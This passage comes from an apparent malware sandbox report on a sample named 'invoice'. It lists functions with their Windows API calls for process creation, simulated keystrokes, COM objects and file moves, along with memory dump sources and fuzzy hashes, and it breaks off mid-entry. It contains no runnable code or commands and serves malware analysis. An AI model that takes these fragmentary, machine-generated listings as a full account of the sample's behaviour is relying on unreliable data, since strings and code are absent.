                        Function 00FD9251 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                          • Part of subcall function 00FDAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00FDAEC7
                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00FD92D6
                        • GetDlgCtrlID.USER32 ref: 00FD92E1
                        • GetParent.USER32 ref: 00FD92FD
                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FD9300
                        • GetDlgCtrlID.USER32(?), ref: 00FD9309
                        • GetParent.USER32(?), ref: 00FD9325
                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FD9328
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 1536045017-1403004172
                        • Opcode ID: 2468c899f3b389e910c3e054737216c152cb2360bd784fb221241cb5caa8348a
                        • Instruction ID: 9ab93eda5dd5588d3be9a2df95fc518496c146a107acfb1cc25f5efd65d093eb
                        • Opcode Fuzzy Hash: 2468c899f3b389e910c3e054737216c152cb2360bd784fb221241cb5caa8348a
                        • Instruction Fuzzy Hash: 94210674D40205BBCF14ABA1CC85EFEBB79EF49310F14021AF56197291DF799815EB20
                        Function 00FD933C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F87F41: _memmove.LIBCMT ref: 00F87F82
                          • Part of subcall function 00FDAEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00FDAEC7
                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00FD93BF
                        • GetDlgCtrlID.USER32 ref: 00FD93CA
                        • GetParent.USER32 ref: 00FD93E6
                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00FD93E9
                        • GetDlgCtrlID.USER32(?), ref: 00FD93F2
                        • GetParent.USER32(?), ref: 00FD940E
                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00FD9411
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                        • String ID: ComboBox$ListBox
                        • API String ID: 1536045017-1403004172
                        • Opcode ID: 0872aecf43166bc5f710f8179a4b7d5fc4922664e87d2fb153a4d1ed65958424
                        • Instruction ID: 27b976e998b19ce91b090f3835c98b143ca1e50a13a3e98ae183d30def0664f3
                        • Opcode Fuzzy Hash: 0872aecf43166bc5f710f8179a4b7d5fc4922664e87d2fb153a4d1ed65958424
                        • Instruction Fuzzy Hash: F8210375A00204BBCF10EBA1CC85EFEBBB9EF49300F144116F95197296DF79881AEB20
                        Function 00FD9425 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetParent.USER32 ref: 00FD9431
                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00FD9446
                        • _wcscmp.LIBCMT ref: 00FD9458
                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00FD94D3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ClassMessageNameParentSend_wcscmp
                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                        • API String ID: 1704125052-3381328864
                        • Opcode ID: 128077fc6e67f35ec8e3e13610405e7c60c8e2f56051577116e586b4697bf9a2
                        • Instruction ID: e69eff3762294ac2a4565a6c639bfa0b88093ca3231077e9d6537c4a6e004ce0
                        • Opcode Fuzzy Hash: 128077fc6e67f35ec8e3e13610405e7c60c8e2f56051577116e586b4697bf9a2
                        • Instruction Fuzzy Hash: D2115CB764C307BAF6216661AC07DA6339D8B07334F20C21BF904E51A2FED668037640
                        Function 00FF89C0 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 00FF89EC
                        • CoInitialize.OLE32(00000000), ref: 00FF8A19
                        • CoUninitialize.OLE32 ref: 00FF8A23
                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00FF8B23
                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00FF8C50
                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01012C0C), ref: 00FF8C84
                        • CoGetObject.OLE32(?,00000000,01012C0C,?), ref: 00FF8CA7
                        • SetErrorMode.KERNEL32(00000000), ref: 00FF8CBA
                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00FF8D3A
                        • VariantClear.OLEAUT32(?), ref: 00FF8D4A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                        • String ID:
                        • API String ID: 2395222682-0
                        • Opcode ID: 3ea6cc10cab1eca8491b38b46fd080bbfa0cd7b5e206a2162ec4c256383e7fa7
                        • Instruction ID: 47c8054a4f3c6e74016792c705821d8b87db8ffb626db92b2d9c964856b061c8
                        • Opcode Fuzzy Hash: 3ea6cc10cab1eca8491b38b46fd080bbfa0cd7b5e206a2162ec4c256383e7fa7
                        • Instruction Fuzzy Hash: F6C137B1608309AFC700EF64C88496AB7E9FF88788F04491DF6859B261DB75ED06DB52
                        Function 00FE7A39 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                        Download Yara Rule
                        APIs
                        • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00FE7B15
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ArraySafeVartype
                        • String ID:
                        • API String ID: 1725837607-0
                        • Opcode ID: 193825d4a72f4812c2c5b0973ca6ddbe9088fb4f35f868622aa2dd162e02617f
                        • Instruction ID: a5048ba5f90780f77721e5d2963e7cd4e857bfc78b92846c74a5e2308ac78687
                        • Opcode Fuzzy Hash: 193825d4a72f4812c2c5b0973ca6ddbe9088fb4f35f868622aa2dd162e02617f
                        • Instruction Fuzzy Hash: 9DB1B271D0434A9FDB21EF95D884BBEB7B5FF48320F244069E900EB251D738A941EB90
                        Function 00FE14FF Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 00FE1521
                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00FE0599,?,00000001), ref: 00FE1535
                        • GetWindowThreadProcessId.USER32(00000000), ref: 00FE153C
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FE0599,?,00000001), ref: 00FE154B
                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FE155D
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FE0599,?,00000001), ref: 00FE1576
                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00FE0599,?,00000001), ref: 00FE1588
                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00FE0599,?,00000001), ref: 00FE15CD
                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00FE0599,?,00000001), ref: 00FE15E2
                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00FE0599,?,00000001), ref: 00FE15ED
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                        • String ID:
                        • API String ID: 2156557900-0
                        • Opcode ID: ad23a69ddafd25a1d4a83b47bc7889ab4dd3d12ab3cd0b15449ed58c9845b899
                        • Instruction ID: ea14cf2fc03e5df197c412c599e52819b213a779c6544133eb7136fdc4187555
                        • Opcode Fuzzy Hash: ad23a69ddafd25a1d4a83b47bc7889ab4dd3d12ab3cd0b15449ed58c9845b899
                        • Instruction Fuzzy Hash: 7231F7B5900304BFDB31DF66DE84FAA37A9FB89321F544015F885C6185EB7A9D40AB50
                        Function 00F8FBBD Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                        Download Yara Rule
                        APIs
                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F8FC06
                        • OleUninitialize.OLE32(?,00000000), ref: 00F8FCA5
                        • UnregisterHotKey.USER32(?), ref: 00F8FDFC
                        • DestroyWindow.USER32(?), ref: 00FC492F
                        • FreeLibrary.KERNEL32(?), ref: 00FC4994
                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FC49C1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                        • String ID: close all
                        • API String ID: 469580280-3243417748
                        • Opcode ID: 108d959e4fa763397105737b9495397031e3b9b53d236af3f8975bb42def63f7
                        • Instruction ID: bec08546d848f5e98b3979ab0c59ce291087476cd5e97f9d7cfd578d0b402dfe
                        • Opcode Fuzzy Hash: 108d959e4fa763397105737b9495397031e3b9b53d236af3f8975bb42def63f7
                        • Instruction Fuzzy Hash: DAA16E31B012238FCB29EF14C9A5F69F764BF05710F5442ADE90AAB252DB34AD16EF50
                        Function 00FDA473 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                        Download Yara Rule
                        APIs
                        • EnumChildWindows.USER32(?,00FDA844), ref: 00FDA782
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ChildEnumWindows
                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                        • API String ID: 3555792229-1603158881
                        • Opcode ID: 63c50f8e95033f2599d3dd22c3a4ece2df49160613f37bb13516cccdd122989f
                        • Instruction ID: faf33c1fad94dc429dc4129aeb6b2acb9c2c634db0a9ded9255cc3e195b701cf
                        • Opcode Fuzzy Hash: 63c50f8e95033f2599d3dd22c3a4ece2df49160613f37bb13516cccdd122989f
                        • Instruction Fuzzy Hash: B591B471A00605EBCB18EF70C881BEDFB76BF05314F18821AE859A7241DF34A959EB95
                        Function 00F82E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                        Download Yara Rule
                        APIs
                        • SetWindowLongW.USER32(?,000000EB), ref: 00F82EAE
                          • Part of subcall function 00F81DB3: GetClientRect.USER32(?,?), ref: 00F81DDC
                          • Part of subcall function 00F81DB3: GetWindowRect.USER32(?,?), ref: 00F81E1D
                          • Part of subcall function 00F81DB3: ScreenToClient.USER32(?,?), ref: 00F81E45
                        • GetDC.USER32 ref: 00FBCEB2
                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FBCEC5
                        • SelectObject.GDI32(00000000,00000000), ref: 00FBCED3
                        • SelectObject.GDI32(00000000,00000000), ref: 00FBCEE8
                        • ReleaseDC.USER32(?,00000000), ref: 00FBCEF0
                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FBCF7B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                        • String ID: U
                        • API String ID: 4009187628-3372436214
                        • Opcode ID: 9f7eedaf4c3632df4d1a610e142d793e2b0e19befb0396a4faf094af2e2fea95
                        • Instruction ID: e38ecd1b4d94eefcb04466bd0aecf0280dac7550a1a468eefc7f57dfca7008a1
                        • Opcode Fuzzy Hash: 9f7eedaf4c3632df4d1a610e142d793e2b0e19befb0396a4faf094af2e2fea95
                        • Instruction Fuzzy Hash: 58719F31900205DFCF21DF65C884AFA7BB6FF49360F1442AAED955A296C7359841EFA0
                        Function 00FF8D5B Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0100F910), ref: 00FF8E3D
                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0100F910), ref: 00FF8E71
                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00FF8FEB
                        • SysFreeString.OLEAUT32(?), ref: 00FF9015
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                        • String ID:
                        • API String ID: 560350794-0
                        • Opcode ID: 636711e0b02505d721a1abda64624807aa5f1675f5b8fc5244bd1a16e2a30c34
                        • Instruction ID: 56cae7308f575c9bcee7048208b3922b9ad3cbd0c23aedfb6779baa1fba2c460
                        • Opcode Fuzzy Hash: 636711e0b02505d721a1abda64624807aa5f1675f5b8fc5244bd1a16e2a30c34
                        • Instruction Fuzzy Hash: 70F13D71A00109EFCB14DF94C888EBEB7B9FF89354F148099F515AB2A0DB71AE46DB50
                        Function 00FFF7A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00FFF7C9
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FFF95C
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00FFF980
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FFF9C0
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00FFF9E2
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FFFB5E
                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00FFFB90
                        • CloseHandle.KERNEL32(?), ref: 00FFFBBF
                        • CloseHandle.KERNEL32(?), ref: 00FFFC36
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                        • String ID:
                        • API String ID: 4090791747-0
                        • Opcode ID: ed1af65db890abb616212eb9f0f774b2c7c7662ec531b5c16c4aa167d376a9c8
                        • Instruction ID: bc982d97d221c81cd153328d8e791f2cf1ae6216b54c348a8401427982eac9c5
                        • Opcode Fuzzy Hash: ed1af65db890abb616212eb9f0f774b2c7c7662ec531b5c16c4aa167d376a9c8
                        • Instruction Fuzzy Hash: C4E1D5316043059FC724EF24C881B7ABBE0AF85364F18846DF9999B2B2DB75DC05EB52
                        Function 00FE4D68 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FE46AF: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FE36DB,?), ref: 00FE46CC
                          • Part of subcall function 00FE46AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FE36DB,?), ref: 00FE46E5
                          • Part of subcall function 00FE4AD8: GetFileAttributesW.KERNEL32(?,00FE374F), ref: 00FE4AD9
                        • lstrcmpiW.KERNEL32(?,?), ref: 00FE4DE7
                        • _wcscmp.LIBCMT ref: 00FE4E01
                        • MoveFileW.KERNEL32(?,?), ref: 00FE4E1C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                        • String ID:
                        • API String ID: 793581249-0
                        • Opcode ID: fdc835a516e495ed229c262db7e9096ab0d4487159a7ed3a3078ed89fca0a910
                        • Instruction ID: 1f2faab7e5686a4dd457a3f34c567cb1b010bec36af04a49c4d88b2a11195a89
                        • Opcode Fuzzy Hash: fdc835a516e495ed229c262db7e9096ab0d4487159a7ed3a3078ed89fca0a910
                        • Instruction Fuzzy Hash: 225173B24083859BC724EBA5DC819DFB3ECAF85710F10092EB285D3151EF38F6889766
                        Function 01008677 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                        Download Yara Rule
                        APIs
                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 01008731
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: InvalidateRect
                        • String ID:
                        • API String ID: 634782764-0
                        • Opcode ID: e0afafa54a1eba925c5f7b9b0b1a58d68592565d3d0cf78757675878ce396320
                        • Instruction ID: 154b3facb28d1ecedba252568716dbb42a60c30e44424faac6d308accd841948
                        • Opcode Fuzzy Hash: e0afafa54a1eba925c5f7b9b0b1a58d68592565d3d0cf78757675878ce396320
                        • Instruction Fuzzy Hash: B351A170900205BBFB729A29DC85B9D3FA8BB09320F108557FAD5E61E1CB75EA909B50
                        Function 00F82B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                        Download Yara Rule
                        APIs
                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FBC477
                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FBC499
                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FBC4B1
                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FBC4CF
                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FBC4F0
                        • DestroyIcon.USER32(00000000), ref: 00FBC4FF
                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FBC51C
                        • DestroyIcon.USER32(?), ref: 00FBC52B
                          • Part of subcall function 0100A4E1: DeleteObject.GDI32(00000000), ref: 0100A51A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                        • String ID:
                        • API String ID: 2819616528-0
                        • Opcode ID: 5fd079807910538bd41717f67876bb9c861b16e4608f041cba73cab50c3c32ba
                        • Instruction ID: 54f25578b809b70a374e3538943e663fc4b190634c7051968e0e650ad0654e0c
                        • Opcode Fuzzy Hash: 5fd079807910538bd41717f67876bb9c861b16e4608f041cba73cab50c3c32ba
                        • Instruction Fuzzy Hash: E0515975A00209EFDB20EF25DC85FAA37A5FB58720F100528F942E7290DB75ED81EB90
                        Function 00FD9930 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00FDAC37: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FDAC57
                          • Part of subcall function 00FDAC37: GetCurrentThreadId.KERNEL32 ref: 00FDAC5E
                          • Part of subcall function 00FDAC37: AttachThreadInput.USER32(00000000,?,00FD9945,?,00000001), ref: 00FDAC65
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FD9950
                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00FD996D
                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00FD9970
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FD9979
                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00FD9997
                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FD999A
                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FD99A3
                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00FD99BA
                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FD99BD
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
